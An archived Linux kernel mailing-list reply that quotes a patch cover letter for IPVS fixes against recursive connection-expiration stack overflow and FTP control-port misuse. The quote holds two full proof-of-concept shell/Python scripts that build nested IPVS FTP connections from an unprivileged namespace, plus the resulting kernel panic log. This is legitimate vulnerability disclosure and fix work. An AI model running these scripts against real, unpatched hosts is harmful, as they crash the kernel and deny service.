> "${IP}" addr add "${REAL}/32" dev lo 2>/dev/null || true
> "${IP}" addr add "${CLIENT}/32" dev lo 2>/dev/null || true
> 
> exec "${PYTHON}" - "${DEPTH}" "${MODE}" "${VIP}" "${REAL}" "${CLIENT}" "${PORT}" <<'PY'
> import ctypes
> import os
> import socket
> import sys
> import threading
> import time
> 
> depth = int(sys.argv[1])
> mode = sys.argv[2]
> vip = sys.argv[3]
> real = sys.argv[4]
> client_ip = sys.argv[5]
> port = int(sys.argv[6])
> 
> ready = threading.Event()
> server_error = []
> client_error = []
> accepted = []
> clients = []
> rejected = 0
> 
> IP_VS_BASE_CTL = 64 + 1024 + 64
> IP_VS_SO_SET_ADD = IP_VS_BASE_CTL + 2
> IP_VS_SO_SET_FLUSH = IP_VS_BASE_CTL + 5
> IP_VS_SO_SET_ADDDEST = IP_VS_BASE_CTL + 7
> 
> 
> class Svc(ctypes.Structure):
>     _fields_ = [
>         ("protocol", ctypes.c_uint16),
>         ("addr", ctypes.c_uint32),
>         ("port", ctypes.c_uint16),
>         ("fwmark", ctypes.c_uint32),
>         ("sched_name", ctypes.c_char * 16),
>         ("flags", ctypes.c_uint),
>         ("timeout", ctypes.c_uint),
>         ("netmask", ctypes.c_uint32),
>     ]
> 
> 
> class Dest(ctypes.Structure):
>     _fields_ = [
>         ("addr", ctypes.c_uint32),
>         ("port", ctypes.c_uint16),
>         ("conn_flags", ctypes.c_uint),
>         ("weight", ctypes.c_int),
>         ("u_threshold", ctypes.c_uint32),
>         ("l_threshold", ctypes.c_uint32),
>     ]
> 
> 
> def native_u32(ip):
>     return int.from_bytes(socket.inet_aton(ip), sys.byteorder)
> 
> 
> def ipvs_sock():
>     return socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
> 
> 
> def ipvs_flush():
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_FLUSH, b"")
>     finally:
>         s.close()
> 
> 
> def ipvs_add_service():
>     svc = Svc()
>     svc.protocol = socket.IPPROTO_TCP
>     svc.addr = native_u32(vip)
>     svc.port = socket.htons(port)
>     svc.fwmark = 0
>     svc.sched_name = b"rr"
>     svc.flags = 0
>     svc.timeout = 0
>     svc.netmask = 0
> 
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADD, bytes(svc))
>     finally:
>         s.close()
>     return svc
> 
> 
> def ipvs_add_dest(svc):
>     dest = Dest()
>     dest.addr = native_u32(real)
>     dest.port = socket.htons(port)
>     dest.conn_flags = 0
>     dest.weight = 1
>     dest.u_threshold = 0
>     dest.l_threshold = 0
> 
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADDDEST, bytes(svc) + bytes(dest))
>     finally:
>         s.close()
> 
> 
> def recv_line(sock):
>     data = bytearray()
>     while not data.endswith(b"\n"):
>         chunk = sock.recv(1)
>         if not chunk:
>             raise RuntimeError("unexpected EOF")
>         data.extend(chunk)
>     return bytes(data)
> 
> 
> def server():
>     try:
>         srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>         srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
>         srv.bind((real, port))
>         srv.listen(depth + 16)
>         ready.set()
>         for i in range(depth):
>             conn, addr = srv.accept()
>             conn.sendall(b"220 ready\r\n")
>             line = recv_line(conn)
>             if b"EPSV" not in line.upper():
>                 raise RuntimeError(f"unexpected request on level {i}: {line!r}")
>             conn.sendall(b"229 Entering Extended Passive Mode (|||21|)\r\n")
>             accepted.append(conn)
>         while True:
>             time.sleep(1)
>     except BaseException as exc:
>         server_error.append(repr(exc))
>         ready.set()
> 
> 
> try:
>     try:
>         ipvs_flush()
>     except OSError:
>         pass
>     service = ipvs_add_service()
>     ipvs_add_dest(service)
> except OSError as exc:
>     raise SystemExit(f"ipvs setup failed: {exc}")
> 
> 
> threading.Thread(target=server, daemon=True).start()
> ready.wait()
> if server_error:
>     raise SystemExit(f"server failed early: {server_error[0]}")
> 
> for i in range(depth):
>     try:
>         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>         s.bind((client_ip, 0))
>         s.connect((vip, port))
>         banner = recv_line(s)
>         if not banner.startswith(b"220 "):
>             raise RuntimeError(f"unexpected banner on level {i}: {banner!r}")
>         s.sendall(b"EPSV\r\n")
>         s.settimeout(0.2)
>         try:
>             reply = recv_line(s)
>         except socket.timeout:
>             rejected += 1
>             print(f"control-port reply rejected on level {i}", flush=True)
>         else:
>             raise RuntimeError(
>                 f"control-port reply was not rejected on level {i}: {reply!r}"
>             )
>         clients.append(s)
>         if (i + 1) % 50 == 0 or i + 1 == depth:
>             print(f"built {i + 1} connections", flush=True)
>     except BaseException as exc:
>         client_error.append(repr(exc))
>         break
> 
> if client_error:
>     raise SystemExit(f"client failed: {client_error[0]}")
> if server_error:
>     raise SystemExit(f"server failed: {server_error[0]}")
> if rejected != depth:
>     raise SystemExit(f"expected {depth} rejected replies, got {rejected}")
> 
> try:
>     with open("/proc/net/ip_vs_conn", "r", encoding="utf-8", errors="replace") as f:
>         conn_lines = sum(1 for _ in f) - 1
> except OSError:
>     conn_lines = -1
> 
> print(f"rejected control-port replies: {rejected}/{depth}", flush=True)
> print(f"ip_vs_conn entries before trigger: {conn_lines}", flush=True)
> if conn_lines != depth:
>     raise SystemExit(
>         f"expected {depth} IPVS entries, got {conn_lines}; "
>         "a passive data connection was created"
>     )
> print(f"passive data connections created: {conn_lines - depth}", flush=True)
> 
> if mode == "hold":
>     while True:
>         time.sleep(1)
> elif mode == "flush":
>     ipvs_flush()
>     print("IPVS flush returned", flush=True)
>     while True:
>         time.sleep(1)
> elif mode == "exit":
>     print("exiting namespace holder", flush=True)
>     sys.stdout.flush()
>     os._exit(0)
> else:
>     raise SystemExit(f"unknown MODE={mode!r}")
> PY
> ------END poc.sh--------
> 
> ------BEGIN poc-active.sh------
> #!/bin/sh
> set -eu
> 
> DEPTH="${1:-400}"
> MODE="${MODE:-exit}"
> SELF_UNSHARE="${SELF_UNSHARE:-0}"
> 
> if [ "${SELF_UNSHARE}" = "1" ] && [ -z "${POC_INNER:-}" ]; then
> 	exec env POC_INNER=1 MODE="${MODE}" SELF_UNSHARE=0 \
> 		unshare -Urn -- "$0" "${DEPTH}"
> fi
> 
> ulimit -n 65535 2>/dev/null || true
> 
> IP=/usr/sbin/ip
> PYTHON=/usr/bin/python3
> 
> VIP=198.51.100.1
> REAL=198.51.100.2
> CLIENT=198.51.100.3
> PORT=21
> 
> "${IP}" link set lo up
> "${IP}" addr add "${VIP}/32" dev lo 2>/dev/null || true
> "${IP}" addr add "${REAL}/32" dev lo 2>/dev/null || true
> "${IP}" addr add "${CLIENT}/32" dev lo 2>/dev/null || true
> 
> exec "${PYTHON}" - "${DEPTH}" "${MODE}" "${VIP}" "${REAL}" "${CLIENT}" "${PORT}" <<'PY'
> import ctypes
> import os
> import socket
> import sys
> import threading
> import time
> 
> depth = int(sys.argv[1])
> mode = sys.argv[2]
> vip = sys.argv[3]
> real = sys.argv[4]
> client_ip = sys.argv[5]
> port = int(sys.argv[6])
> 
> ready = threading.Event()
> server_error = []
> client_error = []
> accepted = []
> clients = []
> 
> IP_VS_BASE_CTL = 64 + 1024 + 64
> IP_VS_SO_SET_ADD = IP_VS_BASE_CTL + 2
> IP_VS_SO_SET_FLUSH = IP_VS_BASE_CTL + 5
> IP_VS_SO_SET_ADDDEST = IP_VS_BASE_CTL + 7
> 
> 
> class Svc(ctypes.Structure):
>     _fields_ = [
>         ("protocol", ctypes.c_uint16),
>         ("addr", ctypes.c_uint32),
>         ("port", ctypes.c_uint16),
>         ("fwmark", ctypes.c_uint32),
>         ("sched_name", ctypes.c_char * 16),
>         ("flags", ctypes.c_uint),
>         ("timeout", ctypes.c_uint),
>         ("netmask", ctypes.c_uint32),
>     ]
> 
> 
> class Dest(ctypes.Structure):
>     _fields_ = [
>         ("addr", ctypes.c_uint32),
>         ("port", ctypes.c_uint16),
>         ("conn_flags", ctypes.c_uint),
>         ("weight", ctypes.c_int),
>         ("u_threshold", ctypes.c_uint32),
>         ("l_threshold", ctypes.c_uint32),
>     ]
> 
> 
> def native_u32(ip):
>     return int.from_bytes(socket.inet_aton(ip), sys.byteorder)
> 
> 
> def ipvs_sock():
>     return socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
> 
> 
> def ipvs_flush():
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_FLUSH, b"")
>     finally:
>         s.close()
> 
> 
> def ipvs_add_service():
>     svc = Svc()
>     svc.protocol = socket.IPPROTO_TCP
>     svc.addr = native_u32(vip)
>     svc.port = socket.htons(port)
>     svc.fwmark = 0
>     svc.sched_name = b"rr"
>     svc.flags = 0
>     svc.timeout = 0
>     svc.netmask = 0
> 
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADD, bytes(svc))
>     finally:
>         s.close()
>     return svc
> 
> 
> def ipvs_add_dest(svc):
>     dest = Dest()
>     dest.addr = native_u32(real)
>     dest.port = socket.htons(port)
>     dest.conn_flags = 0
>     dest.weight = 1
>     dest.u_threshold = 0
>     dest.l_threshold = 0
> 
>     s = ipvs_sock()
>     try:
>         s.setsockopt(socket.IPPROTO_IP, IP_VS_SO_SET_ADDDEST, bytes(svc) + bytes(dest))
>     finally:
>         s.close()
> 
> 
> def recv_line(sock):
>     data = bytearray()
>     while not data.endswith(b"\n"):
>         chunk = sock.recv(1)
>         if not chunk:
>             raise RuntimeError("unexpected EOF")
>         data.extend(chunk)
>     return bytes(data)
> 
> 
> def server():
>     try:
>         srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>         srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
>         srv.bind((real, port))
>         srv.listen(depth + 16)
>         ready.set()
>         for i in range(depth):
>             conn, addr = srv.accept()
>             conn.sendall(b"220 ready\r\n")
>             line = recv_line(conn)
>             if not line.upper().startswith(b"PORT "):
>                 raise RuntimeError(f"unexpected request on level {i}: {line!r}")
>             conn.sendall(b"200 PORT command successful\r\n")
>             accepted.append(conn)
>         while True:
>             time.sleep(1)
>     except BaseException as exc:
>         server_error.append(repr(exc))
>         ready.set()
> 
> 
> try:
>     try:
>         ipvs_flush()
>     except OSError:
>         pass
>     service = ipvs_add_service()
>     ipvs_add_dest(service)
> except OSError as exc:
>     raise SystemExit(f"ipvs setup failed: {exc}")
> 
> 
> threading.Thread(target=server, daemon=True).start()
> ready.wait()
> if server_error:
>     raise SystemExit(f"server failed early: {server_error[0]}")
> 
> for i in range(depth):
>     try:
>         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>         s.bind((client_ip, 0))
>         s.connect((vip, port))
>         banner = recv_line(s)
>         if not banner.startswith(b"220 "):
>             raise RuntimeError(f"unexpected banner on level {i}: {banner!r}")
>         s.sendall(b"PORT 198,51,100,3,4,1\r\n")
>         time.sleep(0.2)
>         clients.append(s)
>         if (i + 1) % 50 == 0 or i + 1 == depth:
>             print(f"built {i + 1} connections", flush=True)
>     except BaseException as exc:
>         client_error.append(repr(exc))
>         break
> 
> if client_error:
>     raise SystemExit(f"client failed: {client_error[0]}")
> if server_error:
>     raise SystemExit(f"server failed: {server_error[0]}")
> 
> try:
>     with open("/proc/net/ip_vs_conn", "r", encoding="utf-8", errors="replace") as f:
>         conn_lines = sum(1 for _ in f) - 1
> except OSError:
>     conn_lines = -1
> 
> print(f"ip_vs_conn entries before trigger: {conn_lines}", flush=True)
> if conn_lines != depth:
>     raise SystemExit(
>         f"expected {depth} IPVS entries, got {conn_lines}; "
>         "a derived data connection was created"
>     )
> print(f"derived data connections created: {conn_lines - depth}", flush=True)
> 
> if mode == "hold":
>     while True:
>         time.sleep(1)
> elif mode == "flush":
>     ipvs_flush()
>     print("IPVS flush returned", flush=True)
>     while True:
>         time.sleep(1)
> elif mode == "exit":
>     print("exiting namespace holder", flush=True)
>     sys.stdout.flush()
>     os._exit(0)
> else:
>     raise SystemExit(f"unknown MODE={mode!r}")
> PY
> ------END poc-active.sh--------
> 
> ----BEGIN crash log----
> [   40.621758] BUG: KASAN: stack-out-of-bounds in __unwind_start (arch/x86/kernel/unwind_orc.c:715)
> [   40.621785] Write of size 112 at addr ff11000007307e98 by task kworker/u8:0/12
> [   40.621785] 
> [   40.621785] CPU: 1 UID: 0 PID: 12 Comm: kworker/u8:0 Not tainted 7.3.0-rc2-g70194dc37670 #1 PREEMPT(lazy) 
> [   40.621785] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> [   40.621785] Workqueue: netns cleanup_net
> [   40.621785] Call Trace:
> 
> [   40.951167] BUG: unable to handle page fault for address: ff11000011430ff4
> [   40.951167] #PF: supervisor instruction fetch in kernel mode
> [   40.951167] #PF: error_code(0x0011) - permissions violation
> [   40.951167] PGD 6f1e067 P4D 6f1f067 PUD 6f20067 PMD 80000000114001e3 
> [   40.951167] Thread overran stack, or stack corrupted
> [   40.951167] Oops: Oops: 0011 [#1] SMP KASAN NOPTI
> [   40.951167] CPU: 0 UID: 0 PID: 11 Comm: kworker/0:1 Tainted: G        W           7.3.0-rc2-g70194dc37670 #1 PREEMPT(lazy) 
> [   40.951167] Tainted: [W]=WARN
> [   40.951167] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
> [   40.951167] Workqueue:  0x0 (events_freezable_pwr_efficient)
> 
> [   40.951167] Call Trace:
> [   40.951167]  <TASK>
> [   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
> [   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
> [   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
> [   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
> [   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
> [   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
> [   40.951167]  ? ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:1341 net/netfilter/ipvs/ip_vs_conn.c:1375)
> [   40.951167]  ? __pfx_ip_vs_conn_expire (net/netfilter/ipvs/ip_vs_conn.c:380 (discriminator 5))
> [   40.951167]  </TASK>
> 
> [   40.951167] Kernel panic - not syncing: Fatal exception
> [   40.951167] Shutting down cpus with NMI
> [   40.951167] Kernel Offset: disabled
> [   40.951167] ---[ end Kernel panic - not syncing: Fatal exception ]---
> -----END crash log-----
> 
> changes in v6:
>   - Replace the v5 deletion patch with Julian Anastasov's latest
>     reference-accounting connection-deletion fix.
>   - Rebase the iterative controller cleanup on the new deletion helper
>     and retain the passive and active FTP control-port checks.
>   - v5 Link: https://lore.kernel.org/all/cover.1790266803.git.zihanx@nebusec.ai/
> changes in v5:
>   - Update patch 1 with Julian Anastasov's v3 connection-deletion fix.
>   - Rebase the iterative cleanup and resend the FTP checks as patch 3/3.
>   - v4 Link: https://lore.kernel.org/all/cover.1790146910.git.zihanx@nebusec.ai/
> changes in v4:
>   - Add the timer-callback deletion fix as patch 1 and rebase the
>     iterative controller cleanup on it.
>   - Add the active-mode guard for configured FTP control ports.
>   - v3 Link: https://lore.kernel.org/all/cover.1789877273.git.zihanx@nebusec.ai/
> changes in v3:
>   - Add the active-mode guard for configured FTP control ports.
>   - Handle the timer-callback race while keeping cleanup iterative.
>   - v2 Link: https://lore.kernel.org/all/cover.1789435989.git.zihanx@nebusec.ai/
> changes in v2:
>   - Replace recursive controller expiration with an iterative path.
>   - Add the FTP-helper checks for configured control ports.
>   - v1 Link: https://lore.kernel.org/all/cover.1789110326.git.zihanx@nebusec.ai/
> 
> Best regards,
> Zihan Xi
> 
> Julian Anastasov (1):
>   ipvs: fix problems during connection deletion
> 
> Zihan Xi (2):
>   ipvs: avoid stack overflow from recursive connection expiration
>   ipvs: reject FTP control ports as data ports
> 
>  include/net/ip_vs.h             |   1 -
>  net/netfilter/ipvs/ip_vs_conn.c | 125 +++++++++++++++++++-------------
>  net/netfilter/ipvs/ip_vs_ftp.c  |  18 +++++
>  net/netfilter/ipvs/ip_vs_sync.c |   2 +-
>  4 files changed, 95 insertions(+), 51 deletions(-)
> 
> -- 
> 2.43.0

Regards

--
Julian Anastasov <ja@ssi.bg>


^ permalink raw reply	[flat|nested] 5+ messages in thread

end of thread, other threads:[~2026-10-05 15:33 UTC | newest]

Thread overview: 5+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-10-05 13:06 [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
2026-10-05 13:06 ` [PATCH nf v6 1/3] ipvs: fix problems during connection deletion Zihan Xi
2026-10-05 13:06 ` [PATCH nf v6 2/3] ipvs: avoid stack overflow from recursive connection expiration Zihan Xi
2026-10-05 13:06 ` [PATCH nf v6 3/3] ipvs: reject FTP control ports as data ports Zihan Xi
2026-10-05 15:25 ` [PATCH nf v6 0/3] ipvs: avoid stack overflow from recursive connection expiration Julian Anastasov

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox